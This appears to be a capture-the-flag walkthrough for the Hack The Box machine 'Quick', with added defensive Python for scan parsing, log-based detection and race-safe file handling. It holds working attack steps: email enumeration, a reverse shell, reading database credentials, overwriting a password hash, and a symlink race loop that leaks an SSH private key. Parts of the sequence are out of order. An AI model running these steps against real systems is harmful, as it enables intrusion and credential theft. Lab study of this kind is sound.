As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command quickly scans the target machine for open ports and saves the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of the nmap timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Tue Apr 4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
9001/tcp open tor-orport
# Nmap done at Tue Apr 4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Tue Apr 4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fbb0618239504b21a862984c9c388270 (RSA)
| 256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA)
|_ 256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds
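Scans like these are easier to compare and track when the -oN output is turned into structured data. The parser below is an added example (not part of the original writeup); it reads nmap's normal output format, keeps the open ports with their service, version and NSE script results, and diffs two scans of the same host. The embedded input is the page's own allPorts and targeted output.

```python
import re

# Sample input: the two scan reports shown above, in nmap's normal (-oN) format.
ALLPORTS = """\
# Nmap 7.93 scan initiated Tue Apr 4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
9001/tcp open tor-orport
# Nmap done at Tue Apr 4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
"""

TARGETED = """\
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fbb0618239504b21a862984c9c388270 (RSA)
|_ 256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# port/proto, state, service, optional version string
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# "|_name: value" or "| name:" lines of NSE script output (continuation lines are skipped)
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap_normal(text):
    """Return {host: {"port/proto": {"state", "service", "version", "scripts"}}}."""
    hosts, host, port = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = hosts.setdefault(m.group(1), {})
            port = None
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            key = f"{m.group(1)}/{m.group(2)}"
            port = host[key] = {
                "state": m.group(3),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
                "scripts": {},
            }
            continue
        m = SCRIPT_RE.match(line)
        if m and port is not None:
            port["scripts"][m.group(1)] = m.group(2).strip()
    return hosts


def diff_scans(old, new):
    """Compare two parsed scans: open ports that appeared or disappeared, and ports
    whose service label changed (typically after -sV replaces the port-table guess)."""
    out = {"opened": [], "closed": [], "service_changed": {}}
    for host in sorted(set(old) | set(new)):
        o = {p for p, d in old.get(host, {}).items() if d["state"] == "open"}
        n = {p for p, d in new.get(host, {}).items() if d["state"] == "open"}
        out["opened"] += [(host, p) for p in sorted(n - o)]
        out["closed"] += [(host, p) for p in sorted(o - n)]
        for p in sorted(o & n):
            a, b = old[host][p]["service"], new[host][p]["service"]
            if a != b:
                out["service_changed"][(host, p)] = (a, b)
    return out


if __name__ == "__main__":
    print(diff_scans(parse_nmap_normal(ALLPORTS), parse_nmap_normal(TARGETED)))
```

Running the diff over the two scans above reports no change in the open port set but a service change on 9001/tcp from tor-orport (the name nmap's services table associates with the port) to http (what -sV actually observed), which is exactly why the second, targeted scan is worth the extra time.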
There seems to be a website running on port 9001. Let's take a look at it.
Now, we should have a version of curl that supports HTTP3. Before trying to access https://portal.quick.htb/, we need to add the domain name to the /etc/hosts file.
Now we need to find out where to authenticate, and with which user. Back on the main website, there was a Get Started button, which goes to the login.php login page.
At the bottom of the main page, we also saw a list of testimonials from some people.
And the clients link goes to a list of companies with their respective countries. As the login page asks for an email, we could build a wordlist such as the following by combining the first name of each person who wrote a testimonial with the domain name of their company, using the country's ccTLD.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.186:9001/login.php
Total requests: 9
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000006: 200 0 L 2 W 80 Ch "roy@darkwing.us"
000000003: 200 0 L 2 W 80 Ch "john@quick.htb"
000000002: 200 0 L 2 W 80 Ch "mike@quick.htb"
000000008: 302 0 L 0 W 0 Ch "elisa@wink.co.uk"
000000007: 200 0 L 2 W 80 Ch "elisa@wink.uk"
000000004: 200 0 L 2 W 80 Ch "tim@qconsulting.uk"
000000005: 200 0 L 2 W 80 Ch "tim@qconsulting.co.uk"
000000001: 200 0 L 2 W 80 Ch "jane@quick.htb"
000000009: 200 0 L 2 W 80 Ch "james@lazycoop.cn"
Total time: 0.102413
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 87.87931
The elisa@wink.co.uk email gets a different status code (302 instead of 200), which suggests it is a valid account. Let's try to log in with that email and password.
We got in. It seems that the search bar of this ticketing system is not working, but from Raise Ticket we can raise a ticket.
If we submit the ticket, a popup message will appear with a ticket identifier.
We need to find a way to search for tickets. Let's enumerate the website using gobuster.
gobuster dir -u http://10.10.10.186:9001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of concurrent threads, in this case 200.
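Both the wfuzz run against login.php and the gobuster run leave a recognisable trace in the Apache access log that the CustomLog line of this server writes: a burst of POSTs to one URL from one client answered with more than one status code (the 200-versus-302 difference that gave away the valid email), and a flood of 404s from one client. The following detector is an added example, not code from the writeup; the log lines, client addresses and timestamps it runs over are constructed, and the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format, the format the vhost's CustomLog directive selects.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    return e


def bursts(events, match, window_s, threshold):
    """Per client IP, keep the events accepted by `match` inside a sliding window of
    `window_s` seconds; return {ip: (peak_count, status_codes_at_peak)} for IPs that
    reach `threshold` events in one window."""
    peaks, recent = {}, defaultdict(deque)
    for e in sorted(events, key=lambda e: e["ts"]):
        if not match(e):
            continue
        q = recent[e["ip"]]
        q.append(e)
        while (e["ts"] - q[0]["ts"]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and len(q) > peaks.get(e["ip"], (0,))[0]:
            peaks[e["ip"]] = (len(q), {x["status"] for x in q})
    return peaks


def detect_login_enumeration(events, window_s=60, threshold=5):
    """Many POSTs to /login.php from one IP answered with more than one status code:
    the server-side view of a login page that responds differently for valid users."""
    found = bursts(events, lambda e: e["method"] == "POST" and e["path"] == "/login.php",
                   window_s, threshold)
    return {ip: v for ip, v in found.items() if len(v[1]) > 1}


def detect_dir_bruteforce(events, window_s=60, threshold=20):
    """A flood of 404s from one IP: the trace left by a wordlist-driven directory scan."""
    return bursts(events, lambda e: e["status"] == 404, window_s, threshold)


def _line(ip, mmss, method, path, status, ua):
    return f'{ip} - - [04/Apr/2023:11:{mmss} +0000] "{method} {path} HTTP/1.1" {status} 80 "-" "{ua}"'


# Constructed sample log (addresses from the documentation ranges, times made up):
# nine login probes, one of them answered 302; 25 wordlist requests that 404; one visitor.
SAMPLE_LOG = (
    [_line("198.51.100.23", f"20:0{i}", "POST", "/login.php", 302 if i == 3 else 200, "Wfuzz/3.1.0")
     for i in range(9)]
    + [_line("198.51.100.23", f"25:{i:02d}", "GET", f"/word{i}", 404, "gobuster/3.5") for i in range(25)]
    + [_line("192.0.2.7", "26:00", "GET", "/index.php", 200, "Mozilla/5.0")]
)


def analyze(lines):
    """Run both detectors over raw log lines and return their findings."""
    events = [e for e in map(parse_line, lines) if e]
    return {"login_enumeration": detect_login_enumeration(events),
            "dir_bruteforce": detect_dir_bruteforce(events)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The detection keys on behaviour rather than on the User-Agent, because the tool's default agent string is trivially changed; the fix on the application side is to answer a failed login identically whether or not the email exists.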
Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called X-Powered-By that has the value Esigate.
Finally, if we reload the search.php page, the server will run the rce script, and we'll catch a reverse shell as sam. Then, we'll be able to grab the user flag.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.186 44264
bash: cannot set terminal process group (1110): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ whoami
whoami
sam
sam@quick:~$ cat user.txt
cat user.txt
34e254646f1732834991f7261317899c
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
As seen below, there are other directories apart from the html directory in /var/www/.
ls -la /var/www
total 20
drwxr-xr-x 5 root root 4096 Dec 14 2021 .
drwxr-xr-x 14 root root 4096 Dec 14 2021 ..
drwxr-xr-x 2 root root 4096 Dec 14 2021 html
drwxrwxrwx 2 root root 4096 Apr 4 14:53 jobs
drwxr-xr-x 6 root root 4096 Dec 14 2021 printer
In fact, if we check the Apache /etc/apache2/sites-enabled/000-default.conf file, we'll see a second virtual host configured for the domain printerv2.quick.htb, which runs as the srvadm user (AssignUserId).
cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
AssignUserId srvadm srvadm
ServerName printerv2.quick.htb
DocumentRoot /var/www/printer
</VirtualHost>
If we try to access that website, there is another login page.
As we have access to all the source code of the website, let's inspect it. The /var/www/printer/db.php file contains credentials for the MySQL database.
cat /var/www/printer/db.php
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
Let's connect to the database using those credentials and enumerate the database.
mysql -u db_adm -pdb_p4ss
There is one database called quick.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| quick |
| sys |
+--------------------+
5 rows in set (0.00 sec)
The quick database has three tables.
mysql> use quick;
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs |
| tickets |
| users |
+-----------------+
3 rows in set (0.01 sec)
The most interesting one is the users table, which has only two entries, containing the password hashes of the users Elisa and Server Admin.
mysql> select * from users;
+--------------+------------------+----------------------------------+
| name | email | password |
+--------------+------------------+----------------------------------+
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)
In fact, we can see how the passwords are being hashed in the index.php file: the password goes through crypt() with the fixed salt fa, and the result is hashed with MD5.
cat /var/www/printer/index.php
...
$password = md5(crypt($password,'fa'));
...
As we won't be able to break the hash, we can simply set the hash of the srvadm@quick.htb user to the same value as Elisa's.
mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email="srvadm@quick.htb";
This way, we can log in as srvadm@quick.htb using the Quick4cc3$$ password.
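The hash swap works because the stored value depends only on the password and a salt fixed in the source code, so a hash copied from one row is valid for any other account. The following is an added example (not the page's or the application's code) that contrasts a stand-in for that scheme with an account-bound one: PBKDF2-HMAC-SHA256 with a random per-user salt into which the account's email is mixed, so a copied salt-and-hash pair no longer verifies under the other account. The passwords used are constructed.

```python
import hashlib
import hmac
import os

# Stand-in for md5(crypt($password,'fa')): a single salt fixed in the code, so the
# stored value depends on the password alone and not on which account it belongs to.
FIXED_SALT = b"fa"


def legacy_hash(password: str) -> str:
    return hashlib.md5(FIXED_SALT + password.encode()).hexdigest()


def legacy_verify(stored: str, password: str) -> bool:
    return hmac.compare_digest(stored, legacy_hash(password))


# Account-bound scheme: random 16-byte salt per user, and the account's email is part
# of the salt, so the derived hash only verifies for the row it was created for.
ITERATIONS = 100_000  # assumption; pick per deployment


def _derive(email: str, password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               salt + email.lower().encode(), ITERATIONS)


def make_record(email: str, password: str) -> dict:
    salt = os.urandom(16)
    return {"email": email, "salt": salt.hex(), "hash": _derive(email, password, salt).hex()}


def verify_record(record: dict, password: str) -> bool:
    """The server looks the row up by the email the user typed, so the derivation
    uses the row's own email; the attacker cannot pick a different one."""
    salt = bytes.fromhex(record["salt"])
    expected = bytes.fromhex(record["hash"])
    return hmac.compare_digest(expected, _derive(record["email"], password, salt))


def hash_copy_works_legacy(elisa_pw: str = "constructed-pw-1") -> bool:
    """Copy Elisa's legacy hash into the srvadm row (the UPDATE above), then try
    Elisa's password against srvadm."""
    users = {"elisa@wink.co.uk": legacy_hash(elisa_pw),
             "srvadm@quick.htb": legacy_hash("constructed-pw-2")}
    users["srvadm@quick.htb"] = users["elisa@wink.co.uk"]
    return legacy_verify(users["srvadm@quick.htb"], elisa_pw)


def hash_copy_works_bound(elisa_pw: str = "constructed-pw-1") -> bool:
    """Same UPDATE against the account-bound scheme, copying salt and hash together."""
    users = {e: make_record(e, p) for e, p in
             [("elisa@wink.co.uk", elisa_pw), ("srvadm@quick.htb", "constructed-pw-2")]}
    src, dst = users["elisa@wink.co.uk"], users["srvadm@quick.htb"]
    dst["salt"], dst["hash"] = src["salt"], src["hash"]
    return verify_record(dst, elisa_pw)


if __name__ == "__main__":
    print("legacy scheme, copied hash accepted:", hash_copy_works_legacy())
    print("bound scheme, copied hash accepted: ", hash_copy_works_bound())
```

Binding the hash to the account closes the copy trick, but it does not change the underlying weakness that made it possible: the database credentials sit in plain text in db.php, readable by the low-privileged shell, and that database account is allowed to UPDATE the users table.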
Once logged in, we'll see a print server website.
We can add a printer. As it asks for an IP address, we can put our own IP address and watch what happens with a netcat listener.
Set a netcat listener on port 5555.
nc -lvnp 5555
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Our new printer should be available from Printers.
By pressing the printer icon, we'll see a message saying that we should add a job.
From the PRINT JOBS section, we can create a new job, which will be received by the netcat listener when the Print button is pressed.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.186 39462
testingVA
Let's inspect the source code and see if there is a way to escalate privileges. The /var/www/printer/job.php file contains the relevant PHP code.
For each new job, the web server creates a new file in the /var/www/jobs/ directory, named with the current date in the Y-m-d_H:i:s format. Then it writes the Bill Details of the job into that file. Finally, it connects to the configured printer and sends the content of the file.
Before making the connection, it waits for 0.5 seconds. This is a time-of-check to time-of-use race: the file name is predictable (just the timestamp), the jobs directory is world-writable (drwxrwxrwx above) and the virtual host runs as srvadm, so during that window we could replace the freshly created file in /var/www/jobs/ with a symbolic link to the private SSH key of the srvadm user. When the server then connects to our machine, we'll receive the id_rsa private key.
Go to /var/www/jobs (the world-writable directory where the job files are created) and run the following command.
cd /var/www/jobs
while true; do date=$(date +%F_%H:%M:%S); if [ -r "$date" ]; then ln -s -f /home/srvadm/.ssh/id_rsa "$date"; fi; done
Now, go ahead and create a new job. When we hit Print, we should see the private SSH key of the srvadm user in our netcat listener.
Connection received on 10.10.10.186 39472
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
...
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA
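The race above is worth seeing from the fixing side. The following is an added example, not code from the writeup or from the application, that shows how a job writer avoids it: an unpredictable file name created exclusively (O_CREAT|O_EXCL) with mode 0600, the device and inode of the file actually written remembered, and the later read done with O_NOFOLLOW and checked against that identity. The scratch directory, job text and "key" file are constructed stand-ins.

```python
import os
import stat
import tempfile


def create_job(job_dir: str, bill_details: str):
    """Create the job file safely: random name, exclusive creation, mode 0600
    (tempfile.mkstemp does all three). Return the path and the (dev, inode)
    identity of the file we wrote, so a later read can confirm it is the same file."""
    fd, path = tempfile.mkstemp(prefix="job-", dir=job_dir)
    try:
        os.write(fd, bill_details.encode())
        st = os.fstat(fd)
    finally:
        os.close(fd)
    return path, (st.st_dev, st.st_ino)


def read_job_checked(path: str, identity) -> str:
    """Re-open without following symlinks and refuse anything that is not the
    regular file created by create_job."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)  # O_NOFOLLOW: Linux, BSD, macOS
    fd = os.open(path, flags)  # raises OSError (ELOOP) if path is now a symlink
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path} is not a regular file")
        if (st.st_dev, st.st_ino) != identity:
            raise PermissionError(f"{path} was replaced after it was created")
        return os.read(fd, 1 << 20).decode()
    finally:
        os.close(fd)


def read_job_naive(path: str) -> str:
    """What the vulnerable flow does: re-read whatever the path points to now."""
    with open(path) as f:
        return f.read()


def simulate(swap_for_symlink: bool) -> dict:
    """Run create -> (optional swap) -> read in a scratch directory and report what
    each reader returned; 'rejected' means the checked reader refused."""
    with tempfile.TemporaryDirectory() as tmp:
        job_dir = os.path.join(tmp, "jobs")
        os.mkdir(job_dir, 0o700)  # owned by the service, not world-writable
        secret = os.path.join(tmp, "id_rsa")  # constructed stand-in for a private key
        with open(secret, "w") as f:
            f.write("-----BEGIN CONSTRUCTED KEY-----")
        path, identity = create_job(job_dir, "testing")
        if swap_for_symlink:
            # the outcome of the race described above: file swapped for a link
            os.remove(path)
            os.symlink(secret, path)
        naive = read_job_naive(path)
        try:
            checked = read_job_checked(path, identity)
        except OSError:
            checked = "rejected"
        return {"naive": naive, "checked": checked}


if __name__ == "__main__":
    print(simulate(False))
    print(simulate(True))
```

Two further changes remove the problem entirely rather than detecting it: send the bill details to the printer from memory instead of re-reading the file, and do not run the web application as the account that owns the secrets (here AssignUserId srvadm is what made the key readable at all).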
Copy and paste the key into an id_rsa file, give it the right permissions, and get a shell as srvadm.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa srvadm@10.10.10.186
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 4 19:10:20 UTC 2023
System load: 1.13 Users logged in: 0
Usage of /: 73.1% of 7.75GB IP address for ens33: 10.10.10.186
Memory usage: 16% IP address for docker0: 172.17.0.1
Swap usage: 0% IP address for br-9ef1bb2e82cd: 172.18.0.1
Processes: 186
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
52 packages can be updated.
27 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 4 18:42:58 2023 from 10.10.14.5
srvadm@quick:~$ whoami
srvadm
If we check the srvadm home directory, we'll see a .cache folder.
The update message has a link to https://portal.quick.htb/, but port 443 is closed on the machine. Maybe we can reach it another way: let's try HTTP3. First, we'll need to install .
If we search the internet for common Esigate exploits, we'll find an article called , which explains how to get Remote Command Execution on the server. First, we need to create a file called rce with a reverse shell command to our local system.